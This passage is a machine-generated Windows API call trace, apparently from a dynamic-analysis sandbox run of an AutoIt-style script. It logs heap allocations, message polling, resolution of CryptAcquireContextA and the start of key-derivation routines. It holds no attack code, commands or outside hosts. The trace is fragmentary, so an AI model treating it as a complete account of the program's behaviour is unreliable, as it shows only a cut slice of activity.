wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0269.145] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0269.145] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0269.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0269.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0269.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0269.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0269.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0269.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0269.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0269.145] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0269.145] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0269.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e980 | out: hHeap=0x970000) returned 1 [0269.145] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0269.145] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0269.145] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0269.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0269.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0269.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0269.145] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0269.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0269.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0269.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0269.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0269.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0269.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0269.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0269.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0269.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0269.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0269.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0269.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0269.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0269.146] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0269.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0269.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0269.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0269.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0269.146] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0269.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0269.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0269.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0269.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0269.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0269.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0269.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0269.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0269.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0269.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0269.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0269.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0269.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0269.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0269.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0269.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0269.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0269.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0269.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0269.147] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0269.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0269.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0269.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0269.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0269.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0269.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0269.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0269.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0269.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0269.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0269.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0269.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0269.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0269.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0269.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0269.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0269.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0269.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69928, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0269.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0269.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0269.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0269.148] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0269.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0269.149] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0269.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0269.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e980 [0269.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0269.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0269.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0269.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69b08 [0269.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69b08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0269.149] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0269.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0269.149] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0269.149] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0269.149] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0269.149] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0269.149] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e980 | out: hHeap=0x970000) returned 1 [0269.149] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0269.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0269.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0269.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0269.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0269.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0269.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0269.149] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0269.149] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0269.149] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0269.149] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0269.150] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0269.150] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0269.150] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0269.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14260 [0269.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0269.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0269.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0269.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0269.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0269.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0269.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0269.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0269.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0269.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0269.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0269.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0269.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0269.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0269.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0269.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0269.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0269.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0269.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0269.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0269.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0269.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0269.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0269.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0269.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0269.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0269.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0269.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0269.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0269.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0269.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0269.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0269.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0269.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0269.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0269.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0269.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0269.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0269.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0269.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0269.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0269.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0269.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0269.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0269.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0269.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0269.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0269.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0269.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0269.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0269.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0269.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0269.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0269.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0269.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0269.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0269.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0269.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0269.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0269.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0269.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0269.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0269.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0269.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0269.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0269.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0269.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0269.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0269.157] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0269.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0269.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0269.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0269.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0269.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0269.158] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0269.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e980 [0269.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0269.158] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0269.158] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0269.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0269.158] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0269.158] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0269.158] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0269.158] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0269.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9b8 [0269.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0269.159] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0269.159] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0269.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0269.159] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0269.159] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0269.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0269.159] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0269.159] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0269.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0269.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0269.159] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0269.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9b8 [0269.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0269.159] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0269.160] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0269.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0269.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0269.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0269.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0269.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0269.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0269.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0269.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0269.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0269.160] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0269.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0269.160] PeekMessageW 